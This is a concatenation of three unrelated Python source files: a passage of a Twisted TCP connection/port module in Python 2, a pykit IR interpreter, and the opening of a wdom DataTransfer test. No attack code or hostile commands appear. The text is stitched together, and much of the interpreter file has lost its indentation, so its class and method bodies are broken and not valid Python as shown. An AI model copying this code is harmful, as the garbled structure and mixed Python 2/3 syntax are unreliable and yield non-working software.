    Return the TLS-capable variant of C{klass}: a subclass mixing in
    L{_TLSMixin} and declaring L{interfaces.ISSLTransport}.

    The mutable default argument is deliberate: it memoizes one generated
    class per input class so repeated startTLS calls reuse the same type.
    """
    try:
        return _existing[klass]
    except KeyError:
        class TLSConnection(_TLSMixin, klass):
            implements(interfaces.ISSLTransport)
        _existing[klass] = TLSConnection
        return TLSConnection
class Connection(abstract.FileDescriptor, _SocketCloser):
    """
    Superclass of all socket-based FileDescriptors.

    This is an abstract superclass of all objects which represent a TCP/IP
    connection based socket.

    @ivar logstr: prefix used when logging events related to this connection.
    @type logstr: C{str}
    """

    implements(interfaces.ITCPTransport, interfaces.ISystemHandle)

    # Becomes 1 (and the instance's class is swapped by _getTLSClass) once
    # startTLS has run.
    TLS = 0

    def __init__(self, skt, protocol, reactor=None):
        abstract.FileDescriptor.__init__(self, reactor=reactor)
        self.socket = skt
        # The reactor can only multiplex non-blocking sockets.
        self.socket.setblocking(0)
        self.fileno = skt.fileno
        self.protocol = protocol

    if SSL:
        # TLS-related API is only present when pyOpenSSL was importable.

        # Holds a _TLSDelayed while pre-TLS bytes are still draining.
        _tlsWaiting = None

        def startTLS(self, ctx, extra):
            """
            Switch this transport to TLS using context factory C{ctx}.

            Returns True if TLS was started immediately, False if startup
            was deferred until currently buffered data has been written.
            """
            assert not self.TLS
            if self.dataBuffer or self._tempDataBuffer:
                # pre-TLS bytes are still being written. Starting TLS now
                # will do the wrong thing. Instead, mark that we're trying
                # to go into the TLS state.
                self._tlsWaiting = _TLSDelayed([], ctx, extra)
                return False

            self.stopReading()
            self.stopWriting()
            self._startTLS()
            # Wrap the raw socket in an OpenSSL connection object.
            self.socket = SSL.Connection(ctx.getContext(), self.socket)
            self.fileno = self.socket.fileno
            self.startReading()
            return True

        def _startTLS(self):
            # Swap in the memoized TLS-capable variant of our class.
            self.TLS = 1
            self.__class__ = _getTLSClass(self.__class__)

        def write(self, bytes):
            """
            Buffer data while TLS startup is pending; otherwise write
            normally.
            """
            if self._tlsWaiting is not None:
                self._tlsWaiting.bufferedData.append(bytes)
            else:
                abstract.FileDescriptor.write(self, bytes)

        def writeSequence(self, iovec):
            """
            Buffer the sequence while TLS startup is pending; otherwise
            write normally.
            """
            if self._tlsWaiting is not None:
                self._tlsWaiting.bufferedData.extend(iovec)
            else:
                abstract.FileDescriptor.writeSequence(self, iovec)

        def doWrite(self):
            result = abstract.FileDescriptor.doWrite(self)
            if self._tlsWaiting is not None:
                if not self.dataBuffer and not self._tempDataBuffer:
                    # Pre-TLS output has drained: really start TLS now and
                    # flush everything buffered in the meantime.
                    waiting = self._tlsWaiting
                    self._tlsWaiting = None
                    self.startTLS(waiting.context, waiting.extra)
                    self.writeSequence(waiting.bufferedData)
            return result

    def getHandle(self):
        """Return the socket for this connection."""
        return self.socket

    def doRead(self):
        """Calls self.protocol.dataReceived with all available data.

        This reads up to self.bufferSize bytes of data from its socket, then
        calls self.dataReceived(data) to process it. If the connection is not
        lost through an error in the physical recv(), this function will return
        the result of the dataReceived call.
        """
        try:
            data = self.socket.recv(self.bufferSize)
        except socket.error, se:
            if se.args[0] == EWOULDBLOCK:
                return
            else:
                return main.CONNECTION_LOST
        if not data:
            # Zero-byte read: the peer performed an orderly shutdown.
            return main.CONNECTION_DONE
        return self.protocol.dataReceived(data)

    def writeSomeData(self, data):
        """
        Write as much as possible of the given data to this TCP connection.

        This sends up to C{self.SEND_LIMIT} bytes from C{data}. If the
        connection is lost, an exception is returned. Otherwise, the number
        of bytes successfully written is returned.
        """
        try:
            # Limit length of buffer to try to send, because some OSes are too
            # stupid to do so themselves (ahem windows)
            return self.socket.send(buffer(data, 0, self.SEND_LIMIT))
        except socket.error, se:
            if se.args[0] == EINTR:
                # Interrupted by a signal: simply retry.
                return self.writeSomeData(data)
            elif se.args[0] in (EWOULDBLOCK, ENOBUFS):
                return 0
            else:
                return main.CONNECTION_LOST

    def _closeWriteConnection(self):
        """
        Half-close the write side of the socket and notify a
        half-close-aware protocol, if the protocol is one.
        """
        try:
            getattr(self.socket, self._socketShutdownMethod)(1)
        except socket.error:
            pass
        p = interfaces.IHalfCloseableProtocol(self.protocol, None)
        if p:
            try:
                p.writeConnectionLost()
            except:
                # A broken protocol callback takes the whole connection down.
                f = failure.Failure()
                log.err()
                self.connectionLost(f)

    def readConnectionLost(self, reason):
        """
        The read side closed: notify a half-close-aware protocol, or lose
        the whole connection if the protocol isn't one.
        """
        p = interfaces.IHalfCloseableProtocol(self.protocol, None)
        if p:
            try:
                p.readConnectionLost()
            except:
                log.err()
                self.connectionLost(failure.Failure())
        else:
            self.connectionLost(reason)

    def connectionLost(self, reason):
        """See abstract.FileDescriptor.connectionLost().
        """
        abstract.FileDescriptor.connectionLost(self, reason)
        self._closeSocket()
        protocol = self.protocol
        # Break reference cycles before invoking the (possibly re-entrant)
        # protocol callback.
        del self.protocol
        del self.socket
        del self.fileno
        protocol.connectionLost(reason)

    logstr = "Uninitialized"

    def logPrefix(self):
        """Return the prefix to log with when I own the logging thread.
        """
        return self.logstr

    def getTcpNoDelay(self):
        """Return whether TCP_NODELAY (Nagle's algorithm disabled) is set."""
        return operator.truth(self.socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))

    def setTcpNoDelay(self, enabled):
        """Enable or disable TCP_NODELAY on the underlying socket."""
        self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, enabled)

    def getTcpKeepAlive(self):
        """Return whether SO_KEEPALIVE is set on the underlying socket."""
        return operator.truth(self.socket.getsockopt(socket.SOL_SOCKET,
                                                     socket.SO_KEEPALIVE))

    def setTcpKeepAlive(self, enabled):
        """Enable or disable SO_KEEPALIVE on the underlying socket."""
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, enabled)
# Only advertise the TLS transport interface when pyOpenSSL is available.
if SSL:
    classImplements(Connection, interfaces.ITLSTransport)
class BaseClient(Connection):
    """A base class for client TCP (and similiar) sockets.
    """
    addressFamily = socket.AF_INET
    socketType = socket.SOCK_STREAM

    def _finishInit(self, whenDone, skt, error, reactor):
        """Called by base classes to continue to next stage of initialization."""
        if whenDone:
            Connection.__init__(self, skt, None, reactor)
            # While connecting, readiness events mean "continue the
            # connection attempt", not data transfer.
            self.doWrite = self.doConnect
            self.doRead = self.doConnect
            reactor.callLater(0, whenDone)
        else:
            reactor.callLater(0, self.failIfNotConnected, error)

    def startTLS(self, ctx, client=1):
        """Start TLS, taking the client side of the handshake by default."""
        if Connection.startTLS(self, ctx, client):
            if client:
                self.socket.set_connect_state()
            else:
                self.socket.set_accept_state()

    def stopConnecting(self):
        """Stop attempt to connect."""
        self.failIfNotConnected(error.UserError())

    def failIfNotConnected(self, err):
        """
        Generic method called when the attemps to connect failed. It basically
        cleans everything it can: call connectionFailed, stop read and write,
        delete socket related members.
        """
        if (self.connected or self.disconnected or
            not hasattr(self, "connector")):
            # Already connected, already dead, or already cleaned up.
            return

        self.connector.connectionFailed(failure.Failure(err))
        if hasattr(self, "reactor"):
            # this doesn't happen if we failed in __init__
            self.stopReading()
            self.stopWriting()
            del self.connector

        try:
            self._closeSocket()
        except AttributeError:
            pass
        else:
            del self.socket, self.fileno

    def createInternetSocket(self):
        """(internal) Create a non-blocking socket using
        self.addressFamily, self.socketType.
        """
        s = socket.socket(self.addressFamily, self.socketType)
        s.setblocking(0)
        # Don't leak the descriptor into spawned subprocesses.
        fdesc._setCloseOnExec(s.fileno())
        return s

    def resolveAddress(self):
        """Resolve the hostname if necessary, then continue connecting."""
        if abstract.isIPAddress(self.addr[0]):
            self._setRealAddress(self.addr[0])
        else:
            d = self.reactor.resolve(self.addr[0])
            d.addCallbacks(self._setRealAddress, self.failIfNotConnected)

    def _setRealAddress(self, address):
        # Record the resolved (numeric) address and start the connect.
        self.realAddress = (address, self.addr[1])
        self.doConnect()

    def doConnect(self):
        """I connect the socket.

        Then, call the protocol's makeConnection, and start waiting for data.
        """
        if not hasattr(self, "connector"):
            # this happens when connection failed but doConnect
            # was scheduled via a callLater in self._finishInit
            return

        # SO_ERROR reports the outcome of a previous asynchronous connect.
        err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
        if err:
            self.failIfNotConnected(error.getConnectError((err, strerror(err))))
            return

        # doConnect gets called twice. The first time we actually need to
        # start the connection attempt. The second time we don't really
        # want to (SO_ERROR above will have taken care of any errors, and if
        # it reported none, the mere fact that doConnect was called again is
        # sufficient to indicate that the connection has succeeded), but it
        # is not /particularly/ detrimental to do so. This should get
        # cleaned up some day, though.
        try:
            connectResult = self.socket.connect_ex(self.realAddress)
        except socket.error, se:
            connectResult = se.args[0]
        if connectResult:
            if connectResult == EISCONN:
                pass
            # on Windows EINVAL means sometimes that we should keep trying:
            # http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winsock/winsock/connect_2.asp
            elif ((connectResult in (EWOULDBLOCK, EINPROGRESS, EALREADY)) or
                  (connectResult == EINVAL and platformType == "win32")):
                # Connection still in progress: wait for readiness events.
                self.startReading()
                self.startWriting()
                return
            else:
                self.failIfNotConnected(error.getConnectError((connectResult, strerror(connectResult))))
                return

        # If I have reached this point without raising or returning, that means
        # that the socket is connected.
        del self.doWrite
        del self.doRead
        # we first stop and then start, to reset any references to the old doRead
        self.stopReading()
        self.stopWriting()
        self._connectDone()

    def _connectDone(self):
        """Hook the protocol up now that the TCP connection is established."""
        self.protocol = self.connector.buildProtocol(self.getPeer())
        self.connected = 1
        self.logstr = self.protocol.__class__.__name__ + ",client"
        self.startReading()
        self.protocol.makeConnection(self)

    def connectionLost(self, reason):
        if not self.connected:
            # The attempt never completed; report it as a connect failure.
            self.failIfNotConnected(error.ConnectError(string=reason))
        else:
            Connection.connectionLost(self, reason)
            self.connector.connectionLost(reason)
class Client(BaseClient):
    """A TCP client."""

    def __init__(self, host, port, bindAddress, connector, reactor=None):
        # BaseClient.__init__ is invoked later
        self.connector = connector
        self.addr = (host, port)

        # whenDone stays set only as long as no setup step has failed.
        whenDone = self.resolveAddress
        err = None
        skt = None

        try:
            skt = self.createInternetSocket()
        except socket.error, se:
            err = error.ConnectBindError(se[0], se[1])
            whenDone = None
        if whenDone and bindAddress is not None:
            try:
                skt.bind(bindAddress)
            except socket.error, se:
                err = error.ConnectBindError(se[0], se[1])
                whenDone = None
        self._finishInit(whenDone, skt, err, reactor)

    def getHost(self):
        """Returns an IPv4Address.

        This indicates the address from which I am connecting.
        """
        return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))

    def getPeer(self):
        """Returns an IPv4Address.

        This indicates the address that I am connected to.
        """
        return address.IPv4Address('TCP', *(self.realAddress + ('INET',)))

    def __repr__(self):
        s = '<%s to %s at %x>' % (self.__class__, self.addr, unsignedID(self))
        return s
class Server(Connection):
    """
    Serverside socket-stream connection class.

    This is a serverside network connection transport; a socket which came from
    an accept() on a server.
    """

    def __init__(self, sock, protocol, client, server, sessionno, reactor):
        """
        Server(sock, protocol, client, server, sessionno)

        Initialize it with a socket, a protocol, a descriptor for my peer (a
        tuple of host, port describing the other end of the connection), an
        instance of Port, and a session number.
        """
        Connection.__init__(self, sock, protocol, reactor)
        self.server = server
        self.client = client
        self.sessionno = sessionno
        self.hostname = client[0]
        # Precompute the log and repr strings once, at accept time.
        protoName = self.protocol.__class__.__name__
        self.logstr = "%s,%s,%s" % (protoName, sessionno, self.hostname)
        self.repstr = "<%s #%s on %s>" % (protoName, self.sessionno,
                                          self.server._realPortNumber)
        self.startReading()
        self.connected = 1

    def __repr__(self):
        """A string representation of this connection.
        """
        return self.repstr

    def startTLS(self, ctx, server=1):
        """Start TLS, taking the accepting side of the handshake by default."""
        started = Connection.startTLS(self, ctx, server)
        if not started:
            return
        if server:
            self.socket.set_accept_state()
        else:
            self.socket.set_connect_state()

    def getHost(self):
        """Returns an IPv4Address.

        This indicates the server's address.
        """
        sockname = self.socket.getsockname()
        return address.IPv4Address('TCP', *(sockname + ('INET',)))

    def getPeer(self):
        """Returns an IPv4Address.

        This indicates the client's address.
        """
        return address.IPv4Address('TCP', *(self.client + ('INET',)))
class Port(base.BasePort, _SocketCloser):
    """
    A TCP server port, listening for connections.

    When a connection is accepted, this will call a factory's buildProtocol
    with the incoming address as an argument, according to the specification
    described in L{twisted.internet.interfaces.IProtocolFactory}.

    If you wish to change the sort of transport that will be used, the
    C{transport} attribute will be called with the signature expected for
    C{Server.__init__}, so it can be replaced.

    @ivar deferred: a deferred created when L{stopListening} is called, and
        that will fire when connection is lost. This is not to be used it
        directly: prefer the deferred returned by L{stopListening} instead.
    @type deferred: L{defer.Deferred}

    @ivar disconnecting: flag indicating that the L{stopListening} method has
        been called and that no connections should be accepted anymore.
    @type disconnecting: C{bool}

    @ivar connected: flag set once the listen has successfully been called on
        the socket.
    @type connected: C{bool}
    """

    implements(interfaces.IListeningPort)

    addressFamily = socket.AF_INET
    socketType = socket.SOCK_STREAM

    # Transport class instantiated for each accepted connection.
    transport = Server
    sessionno = 0
    interface = ''
    backlog = 50

    # Actual port number being listened on, only set to a non-None
    # value when we are actually listening.
    _realPortNumber = None

    def __init__(self, port, factory, backlog=50, interface='', reactor=None):
        """Initialize with a numeric port to listen on.
        """
        base.BasePort.__init__(self, reactor=reactor)
        self.port = port
        self.factory = factory
        self.backlog = backlog
        self.interface = interface

    def __repr__(self):
        if self._realPortNumber is not None:
            return "<%s of %s on %s>" % (self.__class__, self.factory.__class__,
                                         self._realPortNumber)
        else:
            return "<%s of %s (not listening)>" % (self.__class__, self.factory.__class__)

    def createInternetSocket(self):
        s = base.BasePort.createInternetSocket(self)
        if platformType == "posix" and sys.platform != "cygwin":
            # Allow quick rebinding of the port after a restart.
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        return s

    def startListening(self):
        """Create and bind my socket, and begin listening on it.

        This is called on unserialization, and must be called after creating a
        server to begin listening on the specified port.
        """
        try:
            skt = self.createInternetSocket()
            skt.bind((self.interface, self.port))
        except socket.error, le:
            raise CannotListenError, (self.interface, self.port, le)

        # Make sure that if we listened on port 0, we update that to
        # reflect what the OS actually assigned us.
        self._realPortNumber = skt.getsockname()[1]

        log.msg("%s starting on %s" % (self.factory.__class__, self._realPortNumber))

        # The order of the next 6 lines is kind of bizarre. If no one
        # can explain it, perhaps we should re-arrange them.
        self.factory.doStart()
        skt.listen(self.backlog)
        self.connected = True
        self.socket = skt
        self.fileno = self.socket.fileno
        self.numberAccepts = 100

        self.startReading()

    def _buildAddr(self, (host, port)):
        # Wrap the raw (host, port) pair from accept() in an address object.
        return address._ServerFactoryIPv4Address('TCP', host, port)

    def doRead(self):
        """Called when my socket is ready for reading.

        This accepts a connection and calls self.protocol() to handle the
        wire-level protocol.
        """
        try:
            if platformType == "posix":
                numAccepts = self.numberAccepts
            else:
                # win32 event loop breaks if we do more than one accept()
                # in an iteration of the event loop.
                numAccepts = 1
            for i in range(numAccepts):
                # we need this so we can deal with a factory's buildProtocol
                # calling our loseConnection
                if self.disconnecting:
                    return
                try:
                    skt, addr = self.socket.accept()
                except socket.error, e:
                    if e.args[0] in (EWOULDBLOCK, EAGAIN):
                        # No more pending connections; shrink the accept
                        # budget to what we actually used this round.
                        self.numberAccepts = i
                        break
                    elif e.args[0] == EPERM:
                        # Netfilter on Linux may have rejected the
                        # connection, but we get told to try to accept()
                        # anyway.
                        continue
                    elif e.args[0] in (EMFILE, ENOBUFS, ENFILE, ENOMEM, ECONNABORTED):

                        # Linux gives EMFILE when a process is not allowed
                        # to allocate any more file descriptors. *BSD and
                        # Win32 give (WSA)ENOBUFS. Linux can also give
                        # ENFILE if the system is out of inodes, or ENOMEM
                        # if there is insufficient memory to allocate a new
                        # dentry. ECONNABORTED is documented as possible on
                        # both Linux and Windows, but it is not clear
                        # whether there are actually any circumstances under
                        # which it can happen (one might expect it to be
                        # possible if a client sends a FIN or RST after the
                        # server sends a SYN|ACK but before application code
                        # calls accept(2), however at least on Linux this
                        # _seems_ to be short-circuited by syncookies.

                        log.msg("Could not accept new connection (%s)" % (
                            errorcode[e.args[0]],))
                        break
                    raise

                fdesc._setCloseOnExec(skt.fileno())
                protocol = self.factory.buildProtocol(self._buildAddr(addr))
                if protocol is None:
                    # Factory refused the connection.
                    skt.close()
                    continue
                s = self.sessionno
                self.sessionno = s+1
                transport = self.transport(skt, protocol, addr, self, s, self.reactor)
                transport = self._preMakeConnection(transport)
                protocol.makeConnection(transport)
            else:
                # The loop ran its full budget without blocking: raise the
                # budget for the next reactor iteration.
                self.numberAccepts = self.numberAccepts+20
        except:
            # Note that in TLS mode, this will possibly catch SSL.Errors
            # raised by self.socket.accept()
            #
            # There is no "except SSL.Error:" above because SSL may be
            # None if there is no SSL support. In any case, all the
            # "except SSL.Error:" suite would probably do is log.deferr()
            # and return, so handling it here works just as well.
            log.deferr()

    def _preMakeConnection(self, transport):
        """Hook allowing subclasses to wrap or replace the new transport."""
        return transport

    def loseConnection(self, connDone=failure.Failure(main.CONNECTION_DONE)):
        """
        Stop accepting connections on this port.

        This will shut down the socket and call self.connectionLost(). It
        returns a deferred which will fire successfully when the port is
        actually closed, or with a failure if an error occurs shutting down.
        """
        self.disconnecting = True
        self.stopReading()
        if self.connected:
            self.deferred = deferLater(
                self.reactor, 0, self.connectionLost, connDone)
            return self.deferred

    stopListening = loseConnection

    def _logConnectionLostMsg(self):
        """
        Log message for closing port
        """
        log.msg('(TCP Port %s Closed)' % (self._realPortNumber,))

    def connectionLost(self, reason):
        """
        Cleans up the socket.
        """
        self._logConnectionLostMsg()
        self._realPortNumber = None

        base.BasePort.connectionLost(self, reason)
        self.connected = False
        self._closeSocket()
        del self.socket
        del self.fileno

        try:
            self.factory.doStop()
        finally:
            # Clear the flag even if the factory's doStop raised.
            self.disconnecting = False

    def logPrefix(self):
        """Returns the name of my class, to prefix log entries with.
        """
        return reflect.qual(self.factory.__class__)

    def getHost(self):
        """Returns an IPv4Address.

        This indicates the server's address.
        """
        return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))
class Connector(base.BaseConnector):
    """
    IConnector for outgoing TCP connections; resolves service names to
    numeric ports at construction time.
    """
    def __init__(self, host, port, factory, timeout, bindAddress, reactor=None):
        self.host = host
        if isinstance(port, types.StringTypes):
            # A service name such as 'http': look up the port number.
            try:
                port = socket.getservbyname(port, 'tcp')
            except socket.error, e:
                raise error.ServiceNameUnknownError(string="%s (%r)" % (e, port))
        self.port = port
        self.bindAddress = bindAddress
        base.BaseConnector.__init__(self, factory, timeout, reactor)

    def _makeTransport(self):
        """Create the Client transport for one connection attempt."""
        return Client(self.host, self.port, self.bindAddress, self, self.reactor)

    def getDestination(self):
        """Return the IPv4Address this connector will connect to."""
        return address.IPv4Address('TCP', self.host, self.port, 'INET')
| |
# -*- coding: utf-8 -*-
"""
IR interpreter.
"""
from __future__ import print_function, division, absolute_import
import ctypes
import operator
try:
import exceptions
except ImportError:
import builtins as exceptions
from itertools import chain, product
from collections import namedtuple
from functools import partial
import numpy as np
from pykit import types
from pykit.ir import Function, Block, GlobalValue, Const, combine, ArgLoader
from pykit.ir import ops, linearize, defs, tracing
from pykit.utils import ValueDict
#===------------------------------------------------------------------===
# Interpreter
#===------------------------------------------------------------------===
# Sentinel marking an undefined/uninitialized value in the interpreted store.
Undef = "Undef"                           # Undefined/uninitialized value
# Per-run state shared by all stack frames (currently just the refs table).
State = namedtuple('State', ['refs'])     # State shared by stack frames
class Reference(object):
    """
    Models a reference to an object.

    @ivar obj: the referenced object
    @ivar refcount: the reference count
    @ivar producer: the value that produced this reference
    """

    def __init__(self, obj, refcount, producer):
        self.obj, self.refcount, self.producer = obj, refcount, producer
class UncaughtException(Exception):
    """
    Raised by the interpreter when interpreted code raises an exception
    that no interpreted handler catches.
    """
class Interp(object):
"""
Interpret the function given as a ir.Function. See the run() function
below.
func: The ir.Function we interpret
exc_model: ExceptionModel that knows how to deal with exceptions
argloader: InterpArgloader: knows how pykit Values are associated
with runtime (stack) values (loads from the store)
ops: Flat list of instruction targets (['%0'])
blockstarts: Dict mapping block labels to address offsets
prevblock: Previously executing basic block
pc: Program Counter
lastpc: Last value of Program Counter
exc_handlers: List of exception target blocks to try
exception: Currently raised exception
refs: { id(obj) : Reference }
"""
def __init__(self, func, env, exc_model, argloader, tracer):
self.func = func
self.env = env
self.exc_model = exc_model
self.argloader = argloader
self.state = {
'env': env,
'exc_model': exc_model,
'tracer': tracer,
}
self.ops, self.blockstarts = linearize(func)
self.lastpc = 0
self._pc = 0
self.prevblock = None
self.exc_handlers = None
self.exception = None
# __________________________________________________________________
# Utils
def incr_pc(self):
"""Increment program counter"""
self.pc += 1
def decr_pc(self):
"""Decrement program counter"""
self.pc -= 1
def halt(self):
"""Stop interpreting"""
self.pc = -1
@property
def op(self):
"""Return the current operation"""
return self.getop(self.pc)
def getop(self, pc):
"""PC -> Op"""
return self.ops[pc]
def setpc(self, newpc):
self.lastpc = self.pc
self._pc = newpc
pc = property(lambda self: self._pc, setpc, doc="Program Counter")
def blockswitch(self, oldblock, newblock, valuemap):
self.prevblock = oldblock
self.exc_handlers = []
self.execute_phis(newblock, valuemap)
def execute_phis(self, block, valuemap):
"""
Execute all phis in parallel, i.e. execute them before updating the
store.
"""
new_values = {}
for op in block.leaders:
if op.opcode == 'phi':
new_values[op.result] = self.execute_phi(op)
valuemap.update(new_values)
def execute_phi(self, op):
for i, block in enumerate(op.args[0]):
if block == self.prevblock:
values = op.args[1]
return self.argloader.load_op(values[i])
raise RuntimeError("Previous block %r not a predecessor of %r!" %
(self.prevblock.name, op.block.name))
noop = lambda *args: None
# __________________________________________________________________
# Core operations
# unary, binary and compare operations set below
def convert(self, arg):
return types.convert(arg, self.op.type)
# __________________________________________________________________
# Var
def alloca(self, numitems=None):
return { 'value': Undef, 'type': self.op.type }
def load(self, var):
#assert var['value'] is not Undef, self.op
return var['value']
def store(self, value, var):
if isinstance(value, dict) and set(value) == set(['type', 'value']):
value = value['value']
var['value'] = value
def phi(self):
"See execute_phis"
return self.argloader.load_op(self.op)
# __________________________________________________________________
# Functions
def function(self, funcname):
return self.func.module.get_function(funcname)
def call(self, func, args):
if isinstance(func, Function):
# We're calling another known pykit function,
try:
return run(func, args=args, **self.state)
except UncaughtException as e:
# make sure to handle any uncaught exceptions properly
self.exception, = e.args
self._propagate_exc()
else:
return func(*args)
def call_math(self, fname, *args):
return defs.math_funcs[fname](*args)
# __________________________________________________________________
# Attributes
def getfield(self, obj, attr):
if obj['value'] is Undef:
return Undef
return obj['value'][attr] # structs are dicts
def setfield(self, obj, attr, value):
if obj['value'] is Undef:
obj['value'] = {}
obj['value'][attr] = value
# __________________________________________________________________
print = print
# __________________________________________________________________
# Pointer
def ptradd(self, ptr, addend):
value = ctypes.cast(ptr, ctypes.c_void_p).value
itemsize = ctypes.sizeof(type(ptr)._type_)
return ctypes.cast(value + itemsize * addend, type(ptr))
    def ptrload(self, ptr):
        """Dereference: load the item `ptr` points to."""
        return ptr[0]
    def ptrstore(self, value, ptr):
        """Store `value` through pointer `ptr`."""
        ptr[0] = value
def ptr_isnull(self, ptr):
return ctypes.cast(ptr, ctypes.c_void_p).value == 0
def func_from_addr(self, ptr):
type = self.op.type
return ctypes.cast(ptr, types.to_ctypes(type))
# __________________________________________________________________
# Control flow
    def ret(self, arg):
        """Halt this frame; return `arg` unless the function returns Void."""
        self.halt()
        if self.func.type.restype != types.Void:
            return arg
def cbranch(self, test, true, false):
if test:
self.pc = self.blockstarts[true.name]
else:
self.pc = self.blockstarts[false.name]
    def jump(self, block):
        """Unconditionally transfer control to `block`."""
        self.pc = self.blockstarts[block.name]
# __________________________________________________________________
# Exceptions
    def new_exc(self, exc_name, exc_args):
        """Instantiate exception `exc_name` with `exc_args` via the model."""
        return self.exc_model.exc_instantiate(exc_name, *exc_args)
    def exc_catch(self, types):
        """Mark the active exception as handled. (NB: the `types` parameter
        shadows the `types` module within this method and is unused here.)"""
        self.exception = None # We caught it!
    def exc_setup(self, exc_handlers):
        """Install the blocks that may handle exceptions raised from here."""
        self.exc_handlers = exc_handlers
    def exc_throw(self, exc):
        """Raise `exc`: install it and transfer control to a handler."""
        self.exception = exc
        self._propagate_exc() # Find exception handler
def _exc_match(self, exc_types):
"""
See whether the current exception matches any of the exception types
"""
return any(self.exc_model.exc_match(self.exception, exc_type)
for exc_type in exc_types)
    def _propagate_exc(self):
        """Propagate installed exception (`self.exception`)"""
        catch_op = self._find_handler()
        if catch_op:
            # Exception caught! Transfer control to the handler's block
            catch_block = catch_op.parent
            self.pc = self.blockstarts[catch_block.name]
        else:
            # No exception handler! Bail out of the interpreter loop.
            raise UncaughtException(self.exception)
    def _find_handler(self):
        """Find a handler for an active exception"""
        # Scan installed handler blocks for an exc_catch leader whose
        # constant type list matches the active exception; returns None
        # implicitly when nothing matches. (`exc` is currently unused.)
        exc = self.exception
        for block in self.exc_handlers:
            for leader in block.leaders:
                if leader.opcode != ops.exc_catch:
                    continue
                args = [arg.const for arg in leader.args[0]]
                if self._exc_match(args):
                    return leader
# __________________________________________________________________
# Generators
    def yieldfrom(self, op):
        """Generator 'yield from' — not implemented yet."""
        pass # TODO:
    def yieldval(self, op):
        """Generator 'yield' of a single value — not implemented yet."""
        pass # TODO:
# Attach the unary, binary and comparison evaluators from `defs` directly
# onto Interp as opcode handlers; staticmethod() prevents them from binding
# `self` when looked up on the instance.
for opname, evaluator in chain(defs.unary.items(), defs.binary.items(),
                               defs.compare.items()):
    setattr(Interp, opname, staticmethod(evaluator))
#===------------------------------------------------------------------===
# Exceptions
#===------------------------------------------------------------------===
class ExceptionModel(object):
    """
    Model that governs the exception hierarchy
    """

    def exc_op_match(self, exc_type, op):
        """
        See whether the exception produced by IR operation `op` matches
        `exc_type`. Both sides must be 'constant' ops; dynamic checks are
        not implemented.
        """
        assert exc_type.opcode == 'constant'
        if op.opcode == 'constant':
            return self.exc_match(exc_type.const, op.const)
        raise NotImplementedError("Dynamic exception checks")

    def exc_match(self, exc_type, exception):
        """
        See whether `exception` matches `exc_type`.

        NOTE(review): the caller in Interp._exc_match passes the live
        exception as the *first* argument and the candidate type second,
        i.e. the parameter names here look swapped relative to that call
        site — verify before relying on the names.
        """
        return (isinstance(exc_type, exception) or
                issubclass(exception, exc_type))

    def exc_instantiate(self, exc_name, *args):
        """
        Instantiate an exception: look class `exc_name` up in the
        `exceptions` module and construct it with `args`.
        """
        exc_type = getattr(exceptions, exc_name)
        return exc_type(*args)
#===------------------------------------------------------------------===
# Run
#===------------------------------------------------------------------===
class InterpArgLoader(ArgLoader):
    """ArgLoader that resolves IR globals and Undef to Python values."""

    def load_GlobalValue(self, arg):
        # Only internally-defined globals carry a constant value we can use.
        assert not arg.external, "Not supported yet"
        return arg.value.const

    def load_Undef(self, arg):
        # Undefined IR values map to the Undef sentinel.
        return Undef
def run(func, env=None, exc_model=None, _state=None, args=(), tracer=None):
    """
    Interpret function. Raises UncaughtException(exc) for uncaught exceptions

    :param func: pykit Function to interpret
    :param env: optional environment dict; "interp.handlers" may map opcode
        names to functions overriding the built-in Interp handlers
    :param exc_model: exception model (defaults to a fresh ExceptionModel)
    :param args: argument values, one per function parameter
    :param tracer: tracer receiving Call/Op/Res/Ret/Exc records; defaults to
        a fresh DummyTracer per call (a default *instance* in the signature
        would be evaluated once and shared across all calls)
    """
    if tracer is None:
        tracer = tracing.DummyTracer()

    assert len(func.args) == len(args)
    tracer.push(tracing.Call(func, args))

    # -------------------------------------------------
    # Set up interpreter

    valuemap = dict(zip(func.argnames, args)) # { '%0' : pyval }
    argloader = InterpArgLoader(valuemap)
    interp = Interp(func, env, exc_model or ExceptionModel(),
                    argloader, tracer)
    if env:
        handlers = env.get("interp.handlers") or {}
    else:
        handlers = {}

    # -------------------------------------------------
    # Eval loop

    curblock = None
    while True:
        # -------------------------------------------------
        # Block transitioning

        op = interp.op
        if op.block != curblock:
            interp.blockswitch(curblock, op.block, valuemap)
            curblock = op.block

        # -------------------------------------------------
        # Find handler: environment override first, then Interp method

        if op.opcode in handlers:
            fn = partial(handlers[op.opcode], interp)
        else:
            fn = getattr(interp, op.opcode)

        # -------------------------------------------------
        # Load arguments

        args = argloader.load_args(op)

        # -------------------------------------------------
        # Execute...

        tracer.push(tracing.Op(op, args))

        oldpc = interp.pc
        try:
            result = fn(*args)
        except UncaughtException as e:  # was Py2-only `except X, e` syntax
            tracer.push(tracing.Exc(e))
            raise
        valuemap[op.result] = result

        tracer.push(tracing.Res(op, args, result))

        # -------------------------------------------------
        # Advance PC

        if oldpc == interp.pc:
            interp.incr_pc()
        elif interp.pc == -1:
            # Returning...
            tracer.push(tracing.Ret(result))
            return result
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import asyncio
from copy import deepcopy
from unittest.mock import MagicMock, call
from syncer import sync
from wdom.document import get_document
from wdom.event import Event, EventListener, EventTarget, create_event
from wdom.event import MouseEvent, DataTransfer, DragEvent
from wdom.server.handler import create_event_from_msg
from wdom.web_node import WdomElement
from .base import TestCase
class TestDataTransfer(TestCase):
    """Tests for the DataTransfer drag-and-drop payload container."""

    def test_empty(self):
        # A new DataTransfer holds nothing; unknown types read as ''.
        dt = DataTransfer()
        self.assertEqual(dt.length, 0)
        self.assertEqual(dt.getData('test'), '')

    def test_set_clear_data(self):
        dt = DataTransfer()
        dt.setData('text/plain', 'test')
        self.assertEqual(dt.getData('text/plain'), 'test')
        self.assertEqual(dt.getData('test'), '')
        # Setting an existing type overwrites its value.
        dt.setData('text/plain', 'test2')
        self.assertEqual(dt.getData('text/plain'), 'test2')
        dt.setData('text/html', 'test3')
        self.assertEqual(dt.getData('text/plain'), 'test2')
